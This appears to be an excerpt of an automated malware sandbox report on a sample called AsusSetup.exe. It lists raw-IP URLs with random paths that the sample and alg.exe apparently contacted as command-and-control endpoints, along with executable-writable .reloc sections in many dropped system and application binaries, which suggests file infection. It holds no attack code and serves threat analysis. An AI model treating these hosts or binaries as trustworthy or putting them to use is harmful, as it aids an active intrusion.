Source: AsusSetup.exe, 00000000.00000003.1741822854.0000000000543000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742304366.0000000000543000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ywrwbyxrs$9
Source: AsusSetup.exe, 00000000.00000003.1739817164.0000000000579000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.0000000000582000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1740569192.0000000000581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ywrwbyxrsH
Source: alg.exe, 00000002.00000003.1791243483.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1761654612.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1793031401.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1753864187.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1776391888.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1776573627.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1761362905.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1775486594.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1760951972.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/beqepswmsyxaQ
Source: alg.exe, 00000002.00000003.1760951972.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/rdbyhsstwxr
Source: alg.exe, 00000002.00000003.2261855756.000000000054A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2260827027.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2278014771.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/vbtgsklxqvscP
Source: alg.exe, 00000002.00000003.2123146582.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/wfwpk
Source: alg.exe, 00000002.00000003.2069250906.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2088524007.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2053760882.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2080435303.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2037434352.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/ywkdmkysrijolmojP
Source: AsusSetup.exe, 00000000.00000003.1739817164.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/ywrwbyxrs
Source: alg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/
Source: alg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/1.
Source: alg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/B
Source: alg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/ngs
Source: alg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2013243358.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/shm
Source: alg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/shmT
Source: alg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/shmywcqoq
Source: alg.exe, 00000002.00000003.2382821166.000000000054C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2364566236.000000000054C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/jkvhfxewyayfhg
Source: alg.exe, 00000002.00000003.2014132101.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2013455899.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2030058504.0000000000548000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2029468928.0000000000548000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2037434352.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2012540214.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/shm
Source: AsusSetup.exe, 00000000.00000003.1739817164.0000000000579000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.0000000000582000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1740569192.0000000000581000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1722483049.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
Source: alg.exe, 00000002.00000003.1749198316.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/P
Source: alg.exe, 00000002.00000003.1722913142.000000000052E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1722380386.000000000052B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1722483049.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/fnkotvtiwfwjvbky
Source: alg.exe, 00000002.00000003.1722483049.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/fnkotvtiwfwjvbkyu
Source: alg.exe, 00000002.00000003.1749198316.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/gs
Source: alg.exe, 00000002.00000003.2188489063.0000000000528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ibecst
Source: alg.exe, 00000002.00000003.1749198316.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ils
Source: alg.exe, 00000002.00000003.1749198316.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ilssc
Source: alg.exe, 00000002.00000003.2223285252.000000000052D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/mrsvwgseskwgtcO
Source: AsusSetup.exe, 00000000.00000003.1712883179.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1712795088.00000000005C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/tqhhuuvd
Source: alg.exe, 00000002.00000003.2156726854.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2146856016.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2157221824.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2136321596.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2177767483.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2174197488.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2166050081.0000000000549000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2189192585.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2174993099.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2178627316.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2147112358.0000000000549000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2188489063.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2165632802.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2157885847.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/arnrrfwlvkgxeufdP
Source: alg.exe, 00000002.00000003.2213279383.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2212486448.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2189192585.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2199212734.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2188489063.000000000054B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/ibecst
Source: alg.exe, 00000002.00000003.1749535217.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1749090181.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1761654612.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1753864187.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1761362905.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1749623717.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1760951972.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/ils
Source: alg.exe, 00000002.00000003.2251645473.000000000054A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2223981210.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2241493433.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2242965828.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2240825317.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2223285252.000000000054B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2250640541.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/mrsvwgseskwgtcP
Source: AsusSetup.exe, 00000000.00000003.1739817164.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/y
Source: AsusSetup.exe, 00000000.00000003.1738814075.00000000005BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/yn
Source: alg.exe, 00000002.00000003.2013243358.000000000050C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
Source: alg.exe, 00000002.00000003.1953864686.000000000052D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/lxjfxiwwkxywcqoq
Source: alg.exe, 00000002.00000003.1994916519.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2014132101.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1953864686.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1996719983.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2013455899.0000000000547000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2012540214.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/lxjfxiwwkxywcqoq
Source: alg.exe, 00000002.00000003.1878501372.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/saedqhwkiyelcofi
Source: alg.exe, 00000002.00000003.1994916519.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1996719983.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/uswmbyvknw
Source: alg.exe, 00000002.00000003.1913904405.000000000053F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1914838133.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/wxhqgp
Source: AsusSetup.exe, 00000000.00000003.1739817164.0000000000579000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.1742470565.0000000000582000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.1740569192.0000000000581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cvgrf.biz/E
Source: jucheck.exe.2.drString found in binary or memory: http://es5.github.io/#x15.4.4.21
Source: jucheck.exe.2.drString found in binary or memory: http://java.sun.com
Source: jucheck.exe.2.drString found in binary or memory: http://java.sun.comnot
Source: jucheck.exe.2.drString found in binary or memory: http://stackoverflow.com/a/1465386/4224163
Source: jucheck.exe.2.drString found in binary or memory: http://stackoverflow.com/a/15123777)
Source: jucheck.exe.2.drString found in binary or memory: http://stackoverflow.com/questions/1026069/capitalize-the-first-letter-of-string-in-javascript
Source: jucheck.exe.2.drString found in binary or memory: http://stackoverflow.com/questions/1068834/object-comparison-in-javascript
Source: Aut2exe_x64.exe.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/
Source: Aut2exe_x64.exe.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/8
Source: jucheck.exe.2.drString found in binary or memory: http://www.computerhope.com/forum/index.php?topic=76293.0
Source: officesvcmgr.exe.2.drString found in binary or memory: http://www.openssl.org/support/faq.html
Source: officesvcmgr.exe.2.drString found in binary or memory: http://www.openssl.org/support/faq.htmlerror
Source: jucheck.exe.2.drString found in binary or memory: http://www.tutorialspoint.com/javascript/array_map.htm
Source: alg.exe, 00000002.00000003.1834070146.0000000001640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
Source: officesvcmgr.exe.2.drString found in binary or memory: https://clients.config.office.net/manage/v1.0/serviceabilitymanager/MsaDeviceTokenMsaLastUpdatedMsaE
Source: notification_helper.exe.2.drString found in binary or memory: https://clients2.google.com/cr/report
Source: notification_helper.exe.2.drString found in binary or memory: https://clients2.google.com/cr/report..
Source: alg.exe, 00000002.00000003.1944752315.0000000001650000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: alg.exe, 00000002.00000003.1945427316.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1945270930.0000000001650000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: jucheck.exe.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/Reduce
Source: jucheck.exe.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/filter
Source: jucheck.exe.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/indexOf
Source: jucheck.exe.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/Trim
Source: jucheck.exe.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith
Source: jucheck.exe.2.drString found in binary or memory: https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith
Source: alg.exe, 00000002.00000003.2263748821.0000000001470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v2/OfficeFA000000
Source: msedge_proxy.exe.2.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
Source: msedge_proxy.exe.2.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
Source: jucheck.exe.2.drString found in binary or memory: https://javadl-esd-secure.oracle.com/update/%s/map-%s.xml
Source: jucheck.exe.2.drString found in binary or memory: https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xml
Source: jucheck.exe.2.drString found in binary or memory: https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xmlhttps://javadl-esd-secure.oracle.com/upda
Source: officesvcmgr.exe.2.drString found in binary or memory: https://nexusrules.officeapps.live.comhttps://nexus.officeapps.live.com/nexus/upload//nexus/rulesX-M
Source: officesvcmgr.exe.2.drString found in binary or memory: https://otelrules.azureedge.net/rules/UniversaliOSFailed
Source: officesvcmgr.exe.2.drBinary or memory string: RegisterRawInputDevicesmemstr_699cfc83-b
Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\26169d80e67cd874.binJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeCode function: 0_2_02092ED00_2_02092ED0
Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00562ED06_2_00562ED0
Source: C:\Windows\System32\FXSSVC.exeCode function: 9_2_00452ED09_2_00452ED0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 10_2_02282ED010_2_02282ED0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load DriverJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: SecurityJump to behavior
Source: AsusSetup.exeStatic PE information: Resource name: DLL type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: AsusSetup.exeStatic PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
Source: Acrobat.exe.2.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: SingleClientServicesUpdater.exe.2.drStatic PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: SingleClientServicesUpdater.exe0.2.drStatic PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: OneDriveSetup.exe.2.drStatic PE information: Resource name: PAYLOAD type: Microsoft Cabinet archive data, many, 47694794 bytes, 767 files, at 0x44 +A "adal.dll" +A "alertIcon.png", flags 0x4, number 1, extra bytes 20 in head, 6100 datablocks, 0x1503 compression
Source: msedgewebview2.exe.2.drStatic PE information: Number of sections : 14 > 10
Source: msedge_proxy.exe0.2.drStatic PE information: Number of sections : 12 > 10
Source: msedge_pwa_launcher.exe.2.drStatic PE information: Number of sections : 13 > 10
Source: pwahelper.exe0.2.drStatic PE information: Number of sections : 12 > 10
Source: identity_helper.exe.2.drStatic PE information: Number of sections : 12 > 10
Source: msedge_proxy.exe.2.drStatic PE information: Number of sections : 12 > 10
Source: elevation_service.exe.0.drStatic PE information: Number of sections : 12 > 10
Source: pwahelper.exe.2.drStatic PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.2.drStatic PE information: Number of sections : 11 > 10
Source: notification_click_helper.exe.2.drStatic PE information: Number of sections : 13 > 10
Source: elevation_service.exe0.0.drStatic PE information: Number of sections : 12 > 10
Source: setup.exe.2.drStatic PE information: Number of sections : 13 > 10
Source: AsusSetup.exe, 00000000.00000003.1698610449.0000000002BB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs AsusSetup.exe
Source: AsusSetup.exe, 00000000.00000003.1693381638.0000000002AC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs AsusSetup.exe
Source: AsusSetup.exe, 00000000.00000003.1715092599.0000000002FE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs AsusSetup.exe
Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
Source: AsusSetup.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
